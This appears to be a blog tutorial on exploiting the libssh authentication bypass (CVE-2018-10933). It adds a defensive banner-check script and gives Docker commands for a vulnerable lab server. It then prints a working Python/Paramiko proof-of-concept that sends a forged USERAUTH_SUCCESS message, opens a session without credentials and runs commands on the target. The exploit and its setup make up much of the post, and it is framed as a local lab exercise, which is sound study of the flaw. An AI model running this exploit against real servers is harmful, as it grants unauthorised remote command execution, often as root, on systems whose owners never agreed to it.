Exploiting LibSSH – Authentication Bypass Vulnerability (CVE-2018-10933)

All right lads,

Recently, security researcher Peter Winter found a critical vulnerability in the LibSSH library which allows an attacker to gain root access to a server without a username or password. The vulnerability resides in the authentication mechanism of the LibSSH library.

The vulnerability is very easy to exploit: all the attacker has to do is send the affected server an “SSH2_MSG_USERAUTH_SUCCESS” message (the message a server normally sends to a client) to trick the server into thinking the user has already authenticated. For more information, refer to the links at the end of the article.
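To find servers in your own estate that still need the fix, a banner check is usually enough, because libssh announces its version in the SSH identification string. The following is an added example (not part of the original post or of libssh) that parses that banner and flags the affected ranges; the fix shipped in libssh 0.7.6 and 0.8.4, and the sample banners are constructed.

```python
#!/usr/bin/env python
# Banner check for libssh servers affected by CVE-2018-10933.
# Affected: 0.6.0 <= version < 0.7.6 and 0.8.0 <= version < 0.8.4
# (the fix shipped in libssh 0.7.6 and 0.8.4).
import re
import socket

# libssh identifies itself as e.g. "SSH-2.0-libssh_0.7.4"; accept "-" as well.
BANNER_RE = re.compile(r"libssh[_-](\d+)\.(\d+)\.(\d+)")

def parse_libssh_version(banner):
    """Return (major, minor, patch) from an SSH identification line,
    or None if the server is not libssh (or hides its version)."""
    match = BANNER_RE.search(banner)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())

def is_affected(version):
    """True if this libssh version still accepts a client-sent USERAUTH_SUCCESS."""
    if version is None:
        return False
    return (0, 6, 0) <= version < (0, 7, 6) or (0, 8, 0) <= version < (0, 8, 4)

def assess_banner(banner):
    """Map a banner to 'affected', 'fixed' or 'not libssh' for reporting."""
    version = parse_libssh_version(banner)
    if version is None:
        return "not libssh"
    return "affected" if is_affected(version) else "fixed"

def fetch_banner(host, port, timeout=5.0):
    """Read the identification line a server sends on connect (RFC 4253, 4.2).
    Only a TCP connect and one read; no key exchange or authentication."""
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        data = sock.recv(255)
    finally:
        sock.close()
    lines = data.decode("ascii", "replace").splitlines()
    return lines[0] if lines else ""

if __name__ == "__main__":
    # Constructed sample banners standing in for live reads via fetch_banner().
    for sample in ("SSH-2.0-libssh_0.7.4", "SSH-2.0-libssh_0.8.4", "SSH-2.0-OpenSSH_7.4"):
        print("%-24s %s" % (sample, assess_banner(sample)))
```

A banner only reports the upstream version string, so a distribution package that backported the fix will still show an affected number; treat the result as a triage list and confirm against the package changelog.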

Let’s set up our test environment 🙂

Requirements:

  1. Docker (Windows/Linux)
  2. Python 2.7 with the Paramiko module
  3. cygwin64
  4. The vulnerable LibSSH Docker zip, downloaded from here

Now extract the downloaded cve201810933.zip file into the Docker installation directory.

Open start.sh

Docker Installation Directory

Build the Docker image using the command below. It will take some time to download the required packages.

docker build -t fluidattackscve201810933 .

LibSSH vulnerable Docker installation

Now start the container by running the command below.

docker run -it -p 2222:2222 fluidattackscve201810933:latest

Starting our vulnerable server

You will get a root shell. Now start the LibSSH server by running the command below.

./tmp/libssh-0.7.4/build/examples/samplesshd-cb -k ~/.ssh/id_dsa 0.0.0.0 -k ~/.ssh/id_rsa -p 2222 --verbose

Then, on your own machine, run the exploit below (make sure you have installed the Paramiko module).

#!/usr/bin/python
# PoC obtained from https://www.openwall.com/lists/oss-security/2018/10/17/5

import paramiko
import socket
import sys
import time

nbytes = 4096
hostname = "192.168.99.100"  # target Docker IP
port = 2222                  # LibSSH port

sock = socket.socket()
try:
    sock.connect((hostname, port))
    # instantiate the transport and complete the key exchange like a normal client
    m = paramiko.message.Message()
    transport = paramiko.transport.Transport(sock)
    transport.start_client()

    # send USERAUTH_SUCCESS (normally a server-to-client message) without authenticating
    m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
    transport._send_message(m)

    # the vulnerable server now treats the session as authenticated
    cmd_channel = transport.open_session()
    cmd_channel.set_combine_stderr(True)
    cmd_channel.exec_command("whoami; id; ls -la /; ip addr")

    # read back and print the command output
    time.sleep(1)
    print(cmd_channel.recv(nbytes))

except socket.error:
    print('[-] Connecting to host failed. Please check the specified host and port.')
    sys.exit(1)

LibSSH Authentication Bypass Vulnerability

The screenshot below shows successful authentication to the server and the output of the executed commands.